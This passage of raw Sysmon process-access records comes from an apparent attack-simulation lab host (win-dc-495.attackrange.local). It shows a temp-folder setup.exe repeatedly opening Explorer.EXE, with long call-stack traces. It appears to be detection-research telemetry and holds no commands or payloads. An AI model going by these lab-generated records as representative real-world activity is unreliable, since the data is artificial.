.storage.dll+f9471(wow64) 10341000x800000000000000016124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|